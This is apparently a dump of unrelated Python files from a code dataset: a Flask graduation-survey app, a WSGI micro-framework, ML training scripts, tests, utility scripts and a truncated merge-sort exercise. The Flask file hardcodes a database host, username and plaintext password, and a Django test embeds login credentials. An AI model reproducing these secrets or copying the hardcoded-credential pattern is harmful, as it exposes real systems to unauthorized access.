student_info = StudentInfo\n name = student_info.student_name\n stid = student_info.student_id\n seat = student_info.student_seat\n form = QuestionTHForm()\n if form.validate_on_submit():\n age = request.form['age']\n phone = request.form['phone']\n company = request.form['company']\n question1 = request.form['question1']\n question2 = request.form['question2']\n question3 = request.form['question3']\n question4 = request.form['question4']\n question5 = request.form['question5']\n\n # insert question to table\n mydb = mysql.connector.connect(\n host = \"graduation.stamford.edu\",\n user = \"graduati_dbadmin\",\n password = \"y5wiE&RfprAnyrJS\",\n database = \"graduati_dbserver\",\n port = \"3306\"\n )\n mycursor = mydb.cursor()\n recordTuple = (stid, stid, name, age, phone, company, question1, question2, question3, question4, question5)\n mySql_insert_query = \"\"\"INSERT INTO graduate_survey (Id, student_id, name, age, phone, company,\n question1, question2, question3, question4, question5) \n VALUES \n (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s) \"\"\"\n mycursor.execute(mySql_insert_query, recordTuple)\n mydb.commit()\n # update register status\n mycursor.execute(\"SELECT MAX(number) FROM graduate_students\")\n my_result = mycursor.fetchall()\n maxvalue = my_result[0][0] + 1\n register_number = \"STIU-\" + str(maxvalue)\n mycursor.execute(\n \"UPDATE graduate_students SET registered =1,register_number = %s,number =%s WHERE student_id =%s\",\n (register_number, maxvalue, stid,))\n mydb.commit()\n if mycursor:\n mycursor.close()\n if mydb:\n mydb.close()\n return render_template('success.html', stid = stid, seat = seat)\n return render_template('question.html', form = form, name = name, stid = stid)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html')\n\n\n@app.route(\"/backoffice\")\ndef backoffice():\n return render_template('backoffice.html')\n\n\n@app.route(\"/success\")\ndef success():\n student_info = StudentInfo\n seat = student_info.student_seat\n stid = student_info.student_id\n return render_template('success.html', stid = stid, seat = seat)\n\n\n@app.route(\"/seat\")\ndef seat():\n return render_template('seatDisplay.html')\n\n\n@app.route(\"/register\", methods = ['POST', 'GET'])\ndef register():\n form = RegistrationForm()\n if form.validate_on_submit():\n return redirect(url_for('home'))\n return render_template('register.html', title = 'Register', form = form)\n\n\nif __name__ == '__main__':\n app.run(debug = False)\n","sub_path":"Flask_blog/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"343848136","text":"from paste import reloader\nfrom paste.httpserver import serve\n\nfrom tf_request import Request\n\n\nclass TinyFramework:\n \"\"\"\n Примтивный WSGI-совместимый фреймворк\n \"\"\"\n\n def __init__(self):\n self.points = {}\n self.request = None\n\n def run(self, host, port):\n \"\"\"Запуск сервера приложения\"\"\"\n reloader.install()\n serve(self, host=host, port=port)\n\n def route(self, *s_args, **s_kwargs):\n \"\"\"Подключение функций к конкретным путям\"\"\"\n def decorator(func):\n def wrap(*args, **kwargs):\n item = dict()\n item['name'] = func.__name__\n item['methods'] = [method.upper() for method in kwargs['methods']]\n item['call'] = func\n self.points[kwargs['path'].lower()] = item\n return wrap(*s_args, **s_kwargs)\n return decorator\n\n def __call__(self, environ, start_response):\n \"\"\"\n Делаем объект вызываемым\n \"\"\"\n self.request = Request(environ)\n path = environ['PATH_INFO'].lower()\n method = environ['REQUEST_METHOD'].upper()\n if path not in self.points.keys():\n start_response('404 Not Found', [('Content-Type', 'text/html')])\n return ['Incorrect path: {}'.format(path).encode('utf-8')]\n if method not in self.points[path]['methods']:\n start_response('405 Method not allowed', [('Content-Type', 'text/html')])\n return ['Method not allowed: {}'.format(method)]\n result = self.points[path]['call']()\n start_response(result.status_code_as_str, result.headers)\n return [result.body]\n","sub_path":"tiny_framework.py","file_name":"tiny_framework.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"580424551","text":"text = 'I really really like apples'\n\ndef word_count(text):\n text1 = text.replace('.', '')\n text2 = text1.replace(',', '')\n text3 = text2.replace('!', '')\n text4 = text3.replace('?', '')\n lst = text4.split()\n counter = {}\n\n for word in lst:\n word_counter = counter.get(word)\n if word_counter is None:\n counter[word] = 1\n else:\n counter[word] = word_counter + 1\n return counter\n\n counter = {item: text.count(word) for items in set(text)}\n print(counter)\n\n\nprint(word_count(text))","sub_path":"num_of_words.py","file_name":"num_of_words.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"54754688","text":"#!/bin/python3\n\nfrom functools import reduce\n\ndef create_indexes(length):\n a = length // 8\n if length / 8 - a >= 0.5:\n a += 1\n x = []\n for i in range(7):\n x.append((a*i, a*(i+1)))\n x.append((a*7, length))\n return x\n\ndef printlist(l):\n for (a,b) in create_indexes(len(l)):\n print('{:2d}:{:2d} -> {}'.format(a,b,l[a:b]))\n\ndef explode(s):\n if s == \"what's\":\n return ['what', 'is']\n if s == \"hasn't\":\n return ['has', 'not']\n if s == \"haven't\":\n return ['have', 'not']\n if s == \"shouldn't\":\n return ['should', 'not']\n if s == \"wouldn't\":\n return ['would', 'not']\n if s == \"couldn't\":\n return ['could', 'not']\n if s == \"aren't\":\n return ['are', 'not']\n if s == \"wasn't\":\n return ['was', 'not']\n if s == \"it's\":\n return ['it', 'is']\n return [s]\n\nrewrite = lambda xs: reduce(lambda out, cur: out + explode(cur), xs, [])\n","sub_path":"lab01/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"184227952","text":"import os\nimport tempfile\nfrom django.test import TestCase, Client\nimport xlrd\n\n\nclass TestSubmissionImport(TestCase):\n def setUp(self):\n self.client = Client()\n self.client.login(username='tester150411@gmail.com', password='tester150411')\n\n def test_import_template(self):\n\n resp = self.client.get('/entity/entity/template/cli051/?filename=clinic%20test%20project')\n\n xlfile_fd, xlfile_name = tempfile.mkstemp(\".xls\")\n os.write(xlfile_fd, resp.content)\n os.close(xlfile_fd)\n workbook = xlrd.open_workbook(xlfile_name)\n sheet = workbook.sheet_by_index(0)\n self.assertEqual(\n [\n u'entity_question\\n\\nEnter the unique ID for each clinic.\\nYou can find the clinic List on the My Subjects page.\\n\\nExample: cli01',\n u'Name\\n\\nAnswer must be a word 10 characters maximum\\n\\n',\n u'Father age\\n\\nEnter a number between 18-100.\\n\\n',\n u'Report date\\n\\nAnswer must be a date in the following format: day.month.year\\n\\nExample: 25.12.2011',\n u'Blood Group\\n\\nEnter 1 answer from the list.\\n\\nExample: a',\n u'Symptoms\\n\\nEnter 1 or more answers from the list.\\n\\nExample: a or ab',\n u'What is the GPS code for clinic?\\n\\nAnswer must be GPS co-ordinates in the following format: xx.xxxx,yy.yyyy.\\n\\nExample: -18.1324,27.6547',\n u'Required Medicines\\n\\nEnter 1 or more answers from the list.\\n\\nExample: a or ab'\n ], sheet.row_values(0, 0, 8))","sub_path":"datawinners/project/submission/tests/test_submission_import.py","file_name":"test_submission_import.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"259646240","text":"\nfrom src.FileIoUtils import *\nfrom src.DataPreprocessingUtils import *\nfrom src.DeepLearner import *\n\n\n\n\n\n\n\n\n\n\n\n\n\n#instantiating the required objects.\nobj_fileIO = FileIoUtils()\nobj_dataPrepUtils = DataPreprocessingUtils()\nobj_deepLearner = DeepLearner()\n\n\n# #load dataset...\n# #======>>> Bengali 2 English: \"../Datasets/ben-eng/ben.txt\"\n# #======>>> German 2 English: \"../Datasets/deu-eng/deu.txt\"\ndataset = obj_fileIO.load_doc(\"../Datasets/deu-eng/deu.txt\")\n\n\n\n#transform the dataset in pairs...\ndataset_toPairs = obj_dataPrepUtils.to_pairs(dataset)\n\n\n#clean the datasets (removing punctuations, non-printable and so on)\ndataset_clean = obj_dataPrepUtils.clean_pairs(dataset_toPairs)\n\n#pickle save the cleaned dataset\nobj_fileIO.pickle_dump_data(dataset_clean, '../Datasets/deu-eng/english-german.pkl')\n\n\n#load pickle dumped dataset\nraw_dataset = obj_fileIO.load_pickle_dump_dataset('../Datasets/deu-eng/english-german.pkl')\n\n\n# reduce dataset size\nn_sentences = 7000\n\n\n\ntrainDataset, testDataset = obj_dataPrepUtils.train_test_split(raw_dataset[:n_sentences, :], 0.9)\n\nobj_fileIO.pickle_dump_data(trainDataset, '../Datasets/deu-eng/english-german-train.pkl')\nobj_fileIO.pickle_dump_data(testDataset, '../Datasets/deu-eng/english-german-test.pkl')\n\n#\n#\n#\n#\n\nmain_dataset = obj_fileIO.load_pickle_dump_dataset('../Datasets/deu-eng/english-german.pkl')\ntrain_dataset = obj_fileIO.load_pickle_dump_dataset('../Datasets/deu-eng/english-german-train.pkl')\ntest_dataset = obj_fileIO.load_pickle_dump_dataset('../Datasets/deu-eng/english-german-test.pkl')\n\n#\n#\n#\n# prepare english tokenizer\neng_tokenizer = obj_dataPrepUtils.create_tokenizer(main_dataset[:, 0])\neng_vocab_size = len(eng_tokenizer.word_index) + 1\neng_length = obj_dataPrepUtils.max_length(main_dataset[:, 0])\nprint('English Vocabulary Size: %d' % eng_vocab_size)\nprint('English Max Length: %d' % (eng_length))\n\n\n# prepare german tokenizer\nger_tokenizer = obj_dataPrepUtils.create_tokenizer(main_dataset[:, 1])\nger_vocab_size = len(ger_tokenizer.word_index) + 1\nger_length = obj_dataPrepUtils.max_length(main_dataset[:, 1])\nprint('German Vocabulary Size: %d' % ger_vocab_size)\nprint('German Max Length: %d' % (ger_length))\n\n\n\n# prepare training data\ntrainX = obj_dataPrepUtils.encode_sequences(ger_tokenizer, ger_length, train_dataset[:, 1])\ntrainY = obj_dataPrepUtils.encode_sequences(eng_tokenizer, eng_length, train_dataset[:, 0])\ntrainY = obj_dataPrepUtils.encode_output(trainY, eng_vocab_size)\n# prepare validation data\ntestX = obj_dataPrepUtils.encode_sequences(ger_tokenizer, ger_length, test_dataset[:, 1])\ntestY = obj_dataPrepUtils.encode_sequences(eng_tokenizer, eng_length, test_dataset[:, 0])\ntestY = obj_dataPrepUtils.encode_output(testY, eng_vocab_size)\n\n#\n#\n#\n\n# # define model\nmodel = obj_deepLearner.define_model(ger_vocab_size, eng_vocab_size, ger_length, eng_length, 256)\nmodel.compile(optimizer='adam', loss='categorical_crossentropy')\n# summarize defined model\nprint(model.summary())\n#plot_model(model, to_file='model.png', show_shapes=True)\n# fit model\nfilename = 'model.h5'\ncheckpoint = ModelCheckpoint(filename, monitor='val_loss', verbose=1, save_best_only=True, mode='min')\nmodel.fit(trainX, trainY, epochs=30, batch_size=64, validation_data=(testX, testY), callbacks=[checkpoint], verbose=2)\n\n\n\n\n\n\n\n# load model\nmodel = obj_fileIO.load_model('model.h5')\n\nobj_deepLearner.evaluate_model(model, eng_tokenizer, trainX, main_dataset)\n\n\n","sub_path":"src/main_GermanToEnglish.py","file_name":"main_GermanToEnglish.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"552480587","text":"from ui_lib.mapping import CartScreenLocators\nfrom ui_lib.functional import BasePageElement\n\n\nclass CartScreenFunctionality(BasePageElement):\n\n def __init__(self, driver):\n BasePageElement.__init__(self, driver)\n self._map = CartScreenLocators(driver)\n\n def check_if_item_exist_in_cart(self, book_item_):\n print('Verify book in the cart list:')\n print(book_item_)\n cart_items = self._map.cart_items.find_element()\n for item in cart_items:\n if self._is_same_item(item, book_item_):\n print('Item exist in the cart list')\n return True\n print('Item does not exist in the cart list')\n return False\n\n def _is_same_item(self, item_elm, book_item):\n return str.__contains__(item_elm.text, book_item.book_name[:20])\n","sub_path":"ui_lib/functional/cart_screen/cart_screen.py","file_name":"cart_screen.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"424325856","text":"import soundcloud\r\nimport datetime\r\n\r\nclient = soundcloud.Client(\r\n client_id=\"***\",\r\n client_secret=\"***\",\r\n redirect_uri='***'\r\n)\r\nuser_list = client.get('/users/75602319/followings?linked_partitioning=true&page_size=50')\r\n\r\ntime = (datetime.datetime.now() - datetime.timedelta(hours=9,days=1)).time()\r\ntoday = (datetime.datetime.now() - datetime.timedelta(hours=9,days=1)).date()\r\n\r\n#today = today - datetime.timedelta(days=1)\r\n\r\ntoday_format = \"{}/{:02}/{:02} {} +0000\".format(today.year,today.month,today.day,str(time)[:8])\r\nprint(today_format)\r\n\r\nf = open('index.html', 'w')\r\nf.write(\"\")\r\nf.close()\r\n\r\nwhile True:\r\n\tembed_list = []\r\n\tprint(len(user_list.obj[\"collection\"]))\r\n\tfor user in user_list.obj[\"collection\"]:\r\n\t\ttrack_list = client.get('/users/{}/tracks'.format(user['id']),limit=3)\r\n\t\tif len(track_list)>0:\r\n\t\t\tif track_list[0].obj[\"created_at\"]>today_format:\r\n\t\t\t\tprint(track_list[0].obj[\"permalink_url\"])\r\n\t\t\t\tembed_info = '
'.format(track_list[0].obj[\"id\"])\r\n\t\t\t\tembed_list.append(embed_info)\r\n\tf = open('index.html', 'a')\r\n\tf.writelines(embed_list)\r\n\tf.close()\r\n\tif user_list.obj['next_href'] is None:\r\n\t\tbreak\r\n\telse:\r\n\t\tuser_list = client.get(user_list.obj['next_href'])","sub_path":"codes/get_stream.py","file_name":"get_stream.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"221250838","text":"import sys\n\n\ndef calculate_averages(inputf, outputf):\n line_dict = {}\n output_lines = []\n for line in inputf:\n splitl = line[:-1].split('\\t')\n d_key = splitl[3] # Keying by forward primer\n reads = splitl[5] # Number of reads at this location for this sample\n try:\n line_dict[d_key].append(float(reads))\n except KeyError:\n line_dict[d_key] = [float(reads)]\n bareline = '\\t'.join(splitl[:-5]) # Saving the bed lines for later\n if bareline not in output_lines: # Inefficient but can't be bothered\n output_lines.append(bareline)\n\n # outputf.write('chrom\\tchromStart\\tchromEnd\\tfeature\\tforward\\treverse\\taverage_depth\\n')\n for line in output_lines:\n splitl = line.split('\\t')\n d_key = splitl[3]\n avg = [str(float(sum(line_dict[d_key]))/float(len(line_dict[d_key])))]\n # Pretending they're all structural variants so VEP will annotate them, cheating \n # but should work\n outline = splitl[:3] + ['DEL'] + splitl[3:] + avg\n outputf.write('\\t'.join(outline) + '\\n')\n\n\ndef main():\n input_pth = sys.argv[1]\n\n with open(input_pth, 'r') as inputf:\n calculate_averages(inputf, sys.stdout)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Jared/gene_amplicon_bed_metrics/calc_amplicon_averages.py","file_name":"calc_amplicon_averages.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"454352459","text":"n = int(input())\nsynonym = {}\n\nfor i in range(n):\n key, value = input().split()\n synonym[key] = value\nsearch = input()\n\nprint(synonym[search]) if search in synonym else print(list(synonym.keys())\n [list(synonym.values()).index(search)])","sub_path":"Weeks/Week 1/TSIS3/Part 2/3760.py","file_name":"3760.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"149305982","text":"import threading\nfrom queue import Queue\nfrom spider import Spider\nfrom parse_domain import *\nfrom file_operations import *\n\n\nPROJECT_NAME = 'My GitHub'\nHOMEPAGE = 'https://github.com/zhuqinzhou'\nDOMAIN_NAME = get_domain_name(HOMEPAGE)\nQUEUE_FILE = PROJECT_NAME + '/queue.txt'\nCRAWLED_FILE = PROJECT_NAME + '/crawled.txt'\nNUMBER_OF_THREADS = 8\n\n# Uncomment to clear projects.\n# if os.path.exists('./'+PROJECT_NAME+'/crawled.txt'):\n# os.remove('./'+PROJECT_NAME+'/crawled.txt')\n# if os.path.exists('./'+PROJECT_NAME+'/queue.txt'):\n# os.remove('./'+PROJECT_NAME+'/queue.txt')\n\nqueue = Queue()\nSpider(PROJECT_NAME, HOMEPAGE, DOMAIN_NAME)\n\n\ndef create_workers():\n for _ in range(NUMBER_OF_THREADS):\n t = threading.Thread(target=work)\n t.daemon = True\n t.start()\n\n\ndef work():\n while True:\n url = queue.get()\n Spider.crawl_page(threading.current_thread().name, url)\n queue.task_done()\n\n\ndef create_jobs():\n for link in file_to_set(QUEUE_FILE):\n queue.put(link)\n queue.join()\n crawl()\n\n\ndef crawl():\n queue_links = file_to_set(QUEUE_FILE)\n if len(queue_links) > 0:\n print(str(len(queue_links)) + ' links in the queue.')\n create_jobs()\n\ncreate_workers()\ncrawl()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"41134944","text":"from pyspark import SparkContext\nimport sys\nimport itertools\nimport time\nimport math\n\ndef aprioriAlgo(partion,support) : \n # Apriori Algorithm\n # To Find First Frequent Pairs , count the number of values, for all count >= support, consider them to be L1\n ans = []\n index = 0 \n dictionaryForC1 = dict()\n for items in partion :\n for item in items :\n item_1 = item\n if(dictionaryForC1.get(item_1) != None) :\n dictionaryForC1[item_1] += 1\n else : \n dictionaryForC1[item_1] = 1\n index = index + 1\n support = math.ceil(support * (index/count))\n if(len(dictionaryForC1)>0) :\n l1 = [tuple([key]) for key,value in dictionaryForC1.items() if value >= support]\n l1= sorted(l1)\n ans = ans + l1\n # for All remaining pairs, rule of monotonicity.\n #If [a,b,c] is a frequent pair, then its immidiate subsets [a,b],[b,c],[c,a] should also be frequent.\n min_k = 2\n frequent_item_subset = l1\n while(True) :\n Cn= list()\n for frequent_item in itertools.combinations(frequent_item_subset,2) : \n candidateList = list(frequent_item[0])+ list(frequent_item[1])\n candidateSet = set(candidateList)\n candidateSet = sorted(candidateSet)\n if(len(candidateSet) == min_k and tuple(candidateSet) not in Cn): \n #Generate its subset, check if all of them are frequent or not.\n flag = True\n if(flag) : \n count_value = 0 \n for backets in partion :\n if(set(candidateSet).issubset(set(backets))) :\n count_value = count_value + 1\n if(count_value >=support) : \n Cn.append(tuple(candidateSet)) \n Cn.sort()\n if(len(Cn)==0) : \n break\n ans = ans + Cn\n frequent_item_subset = Cn\n min_k = min_k+1\n return ans\ndef mapPhase2(partion,candidatePairs):\n #Map Phase 2 \n dictionary = {}\n for basket in partion : \n for pair in candidatePairs : \n if(set(pair).issubset(set(basket))) : \n if(dictionary.get(tuple(pair)) != None) : \n dictionary[tuple(pair)] +=1\n else : \n dictionary[tuple(pair)] =1\n ans = [tuple([key,value]) for key,value in dictionary.items()]\n return ans\n\n\nstartDate = time.time()\nsc = SparkContext().getOrCreate()\ncsv_file = sc.textFile(sys.argv[3])\nmain = csv_file.take(1)\nrddcsv = csv_file.filter(lambda x: x not in str(main).strip(\"[]\"))\nrddMap = rddcsv.map(lambda x :x.split(\",\"))\nif int(sys.argv[1].strip()) == 1:\n caseRdd = rddMap.map(lambda x: (x[0],x[1])).reduceByKey(lambda x,y: x +\", \"+ y)\nelse : \n caseRdd = rddMap.map(lambda x: (x[1],x[0])).reduceByKey(lambda x,y: x +\", \"+ y)\ncaseRdd = caseRdd.map(lambda x : x[1].split(\", \"))\ncount = caseRdd.count()\nsupport = int(sys.argv[2])\ncandidatePairs = caseRdd.mapPartitions(lambda x : aprioriAlgo(list(x),support)).distinct().sortBy(lambda x : (len(set(x)),x))\ncollect = candidatePairs.collect()\nfrequentPairs = caseRdd.mapPartitions(lambda x : mapPhase2(list(x),collect)).reduceByKey(lambda x,y : x+y).filter(lambda x :x[1]>=support).sortBy(lambda x : (len(set(x[0])),x[0])).map(lambda x : x[0])\n\nf = open(sys.argv[4],\"w\")\nf.write(\"Candidates:\\n\")\nindex = 1\nstart = 0\nfor i in collect : \n if(len(i)==index and index !=1) :\n f.write(\",\"+str(i))\n elif(len(i)==index and index == 1): \n if(start == 0) : \n f.write(\"('\"+str(i[0]) +\"')\")\n else : \n f.write(\",('\"+str(i[0]) +\"')\")\n start = 1\n elif(len(i)==index + 1):\n index = index + 1\n f.write('\\n')\n f.write('\\n')\n f.write(str(i))\n\nf.write('\\n')\nf.write('\\n')\nf.write(\"Frequent Itemsets:\\n\")\nstart = 0 \nindex = 1\nfor i in frequentPairs.collect() : \n if(len(i)==index and index !=1) :\n f.write(\",\"+str(i))\n elif(len(i)==index and index == 1): \n if(start == 0) : \n f.write(\"('\"+str(i[0]) +\"')\")\n else : \n f.write(\",('\"+str(i[0]) +\"')\")\n start = 1\n elif(len(i)==index + 1):\n index = index + 1\n f.write('\\n')\n f.write('\\n')\n f.write(str(i))\nprint(\"Duration: \"+ str(time.time()-startDate))\n\nf.close()\nsc.stop()\n\n","sub_path":"Assign2/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"19020890","text":"from django import forms\nfrom .models import Blog, Comment\n\nclass NewBlog(forms.ModelForm):\n class Meta:\n model = Blog\n fields = ['title', 'body']\n # 모델에 있는 모든 항목을 입력받고 싶은 경우에는\n # fields = '__all__' 이라고 작성\nclass BlogCommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n \n fields = ['comment_user', 'comment_textfield']\n widgets = {\n 'comment_textfield' : forms.Textarea(attrs={'class': 'form-control', 'rows': 4, 'cols': 40})\n }","sub_path":"mycrud/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"516541292","text":"#!/usr/bin/env python3\n\nimport os\nimport pdb\nimport glob\nimport math\nimport functools\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import KFold, GridSearchCV\nfrom sklearn.svm import SVR\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.preprocessing import MinMaxScaler\nfrom scipy.stats import pearsonr\n\noutput_file_path = './annotator_agreement.csv'\n\ndef cmp_file_names(x, y):\n x_number_str = os.path.basename(x).split('.')[0]\n y_number_str = os.path.basename(y).split('.')[0]\n if int(x_number_str) < int(y_number_str):\n return -1\n else:\n return 1\n\ndef NormalizeAnnotations(df):\n norm_df = df.copy()\n for col_idx in range(df.shape[1]):\n norm_df.iloc[:,col_idx] += df.mean(axis=0)[col_idx]\n return norm_df - df.mean().mean()\n\n# DF columns are annotators, row are time indices\ndef ComputeCronbachAlpha(df):\n vars_vals = df.var(axis=0, ddof=1)\n sum_vals = df.sum(axis=1)\n N = df.shape[1]\n return (N/(N-1))*(1.0 - vars_vals.sum() / sum_vals.var(ddof=1))\n\ndef MediaevalAnnotatorAgreement():\n cur_file_path = os.path.dirname(os.path.realpath(__file__))\n mediaeval_anno_path = os.path.join(cur_file_path, '..', '..', 'datasets', 'mediaeval', 'annotations', 'annotations per each rater', 'dynamic (per second annotations)')\n arousal_anno_path = os.path.join(mediaeval_anno_path, 'arousal')\n valence_anno_path = os.path.join(mediaeval_anno_path, 'valence')\n\n results_dict = {}\n for anno_dimension in [('arousal', arousal_anno_path), ('valence', valence_anno_path)]:\n print(\"Computing %s annotator agreement...\"%(anno_dimension[0]))\n cur_dimension = anno_dimension[0]\n anno_files_path = anno_dimension[1]\n anno_files = glob.glob(os.path.join(anno_files_path, '*.csv'))\n\n # Use all but the last 58 songs, which are the 2015 evaluation full-length songs\n anno_files.sort(key=functools.cmp_to_key(cmp_file_names))\n anno_files = anno_files[:-58]\n\n # Compute annotator agreement\n anno_agree_dict = {}\n for anno_file in anno_files:\n task_name = os.path.basename(anno_file)\n\n # Read and format annotation data\n anno_df = pd.read_csv(anno_file)\n if 'WorkerId' in anno_df.columns:\n anno_df = anno_df.drop(columns='WorkerId')\n num_annos = anno_df.shape[0]\n times_str = [x[7:-2] for x in anno_df.columns]\n times_sec = [float(t)/1000.0 for t in times_str]\n anno_df = anno_df.T\n anno_df.index = times_sec\n anno_df.columns = ['A%0d'%(i) for i in range(anno_df.shape[1])]\n\n # Normalize annotations\n anno_df = NormalizeAnnotations(anno_df)\n\n # Compute annotator agreement measure(s)\n anno_agree_dict[task_name] = {'name': task_name}\n\n # Cronbach's Alpha\n alpha = ComputeCronbachAlpha(anno_df)\n alpha = max(0,alpha) # Clamping to positive values, as per the paper\n anno_agree_dict[task_name]['cronbach_alpha_'+cur_dimension] = alpha\n\n # Pearson correlation\n num_pairs = ((anno_df.shape[1]-1)*anno_df.shape[1])/2\n avg_pearson = (anno_df.corr(method='pearson').sum().sum()-anno_df.shape[1])/(2*num_pairs)\n anno_agree_dict[task_name]['annotator_pearson_mean_'+cur_dimension] = avg_pearson\n\n # Store the sample length per task\n anno_agree_dict[task_name]['num_samples_'+cur_dimension] = anno_df.shape[0]\n\n # Save results\n anno_agree_df = pd.DataFrame(anno_agree_dict).T\n results_dict[cur_dimension] = anno_agree_df\n\n results_df = None\n for result in results_dict.keys():\n if results_df is None:\n results_df = results_dict[result]\n else:\n results_df = results_df.merge(results_dict[result], on='name', how='outer')\n results_df['cronbach_alpha_sum'] = results_df.loc[:,'cronbach_alpha_arousal'] + results_df.loc[:,'cronbach_alpha_valence']\n results_df['cronbach_alpha_prod'] = results_df.loc[:,'cronbach_alpha_arousal']*results_df.loc[:,'cronbach_alpha_valence']\n anno_agree_df = results_df.reindex(columns=['name', 'num_samples_arousal', 'num_samples_valence', 'annotator_pearson_mean_arousal', 'annotator_pearson_mean_valence', 'cronbach_alpha_arousal', 'cronbach_alpha_valence', 'cronbach_alpha_sum', 'cronbach_alpha_prod'])\n anno_agree_df = anno_agree_df.sort_values(by=['cronbach_alpha_prod'], ascending=False)\n anno_agree_df.to_csv(os.path.join(cur_file_path, output_file_path), index=False)\n return\n\nif __name__=='__main__':\n MediaevalAnnotatorAgreement()\n","sub_path":"scripts/dataset/mediaeval/baseline/annotator_agreement_mediaeval.py","file_name":"annotator_agreement_mediaeval.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"458201608","text":"from pymongo import MongoClient\nimport re\nimport ast\nfrom textblob import TextBlob\n\n\nclient = MongoClient()\ndb = client.zomato\ncollection = db.reviews\n\nreviewsList = []\n\nrev = db.reviews.find({})\n\nsentences = []\n\nfor r in rev:\n\tx = str(r)\n\t#x.split('\"')\n\tx = re.findall('\".+?\"', x)\n\tx = filter(None, x)\n\ty = []\n\tfor i in x:\n\t\ty = i[1:-2]\n\t\tsentences.append(y)\n\t\t#y = y.split('(?>> import mars.tensor as mt\n\n >>> a = mt.arange(6).reshape(2,3)\n >>> a.execute()\n array([[0, 1, 2],\n [3, 4, 5]])\n >>> mt.argmax(a).execute()\n 5\n >>> mt.argmax(a, axis=0).execute()\n array([1, 1, 1])\n >>> mt.argmax(a, axis=1).execute()\n array([2, 2])\n\n Indexes of the maximal elements of a N-dimensional tensor:\n\n >>> ind = mt.unravel_index(mt.argmax(a, axis=None), a.shape)\n >>> ind.execute()\n (1, 2)\n >>> a[ind].execute() # TODO(jisheng): accomplish when fancy index on tensor is supported\n\n >>> b = mt.arange(6)\n >>> b[1] = 5\n >>> b.execute()\n array([0, 5, 2, 3, 4, 5])\n >>> mt.argmax(b).execute() # Only the first occurrence is returned.\n 1\n\n \"\"\"\n op = TensorArgmax(axis=axis, dtype=np.dtype(int), combine_size=combine_size)\n return op(a, out=out)\n","sub_path":"mars/tensor/reduction/argmax.py","file_name":"argmax.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"373132163","text":"#!/usr/bin/python\nimport logging\nimport multiprocessing\nimport csv\nfrom Family import Family\nfrom consumer import Consumer\nfrom data_adapters import person_from_row\nfrom writer import Writer\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\ndef simulate_stream(input_file, output_stream):\n task_queue = multiprocessing.JoinableQueue()\n results_queue = multiprocessing.Queue()\n num_consumers = multiprocessing.cpu_count()\n reader = csv.DictReader(open(input_file), delimiter=',')\n\n start_consumers(num_consumers, results_queue, task_queue)\n\n writer = Writer(results_queue, output_stream)\n writer.start()\n\n publish_rows(reader, task_queue)\n\n end_consumers(num_consumers, task_queue)\n\n logger.info(\"Waiting for processes to die...\")\n # Wait for all of the tasks to finish\n task_queue.join()\n writer.join()\n logger.info(\"Done ...\")\n\n\ndef start_consumers(num_consumers, results, tasks):\n logger.info('Creating %d consumers' % num_consumers)\n consumers = [Consumer(tasks, results)\n for i in xrange(num_consumers)]\n for w in consumers:\n w.start()\n\n\ndef end_consumers(num_consumers, tasks):\n logger.info(\"Killing everyone...\")\n for i in xrange(num_consumers):\n tasks.put(None)\n\n\ndef publish_rows(reader, tasks):\n current_family = None\n row_number = 0\n for row in reader:\n person = person_from_row(row)\n\n if current_family is None:\n current_family = Family(person.familiy_id)\n\n if current_family.ID == person.familiy_id:\n current_family.add_person(person)\n else:\n tasks.put(current_family)\n current_family = Family(person.familiy_id)\n current_family.add_person(person)\n row_number += 1\n if row_number % 10000 == 0:\n logger.info(row_number)\n tasks.put(current_family)\n","sub_path":"data_import.py","file_name":"data_import.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"502922483","text":"# TO-DO: complete the helper function below to merge 2 sorted arrays\r\ndef merge(arrA, arrB):\r\n elements = len(arrA) + len(arrB)\r\n merged_arr = [0] * elements\r\n # TO-DO\r\n index = index_a = index_b = 0\r\n while index_a < 